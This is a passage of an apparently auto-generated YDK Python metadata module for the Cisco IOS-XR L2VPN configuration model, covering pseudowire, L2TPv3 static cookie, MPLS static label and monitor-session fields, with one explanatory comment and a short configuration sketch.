''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
                    ''' List of backup pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
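    # Note: the 'source-address' union above exposes both an IPv4 and an
    # IPv6 pattern branch, yet every branch's description reads "Must be
    # IPv6 only"; that wording is inherited verbatim from the
    # Cisco-IOS-XR-l2vpn-cfg model itself.
    #
    # A minimal configuration sketch for a static-label pseudowire neighbor,
    # assuming the class nesting mirrors the meta paths above (instantiation
    # idioms vary between YDK releases, so treat the handles as
    # illustrative, not as the definitive API):
    #
    #   from ydk.models.cisco_ios_xr import Cisco_IOS_XR_l2vpn_cfg as l2vpn_cfg
    #
    #   pw = l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup. \
    #       P2PXconnects.P2PXconnect.Pseudowires.Pseudowire()
    #   pw.pseudowire_id = 100                        # key, 1..4294967295
    #   nbr = pw.Neighbor()                           # keyed by IPv4 address
    #   nbr.neighbor = '10.0.0.2'
    #   nbr.mpls_static_labels.local_static_label = 16
    #   nbr.mpls_static_labels.remote_static_label = 17
    #   pw.neighbor.append(nbr)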
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
                    ''' List of backup pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
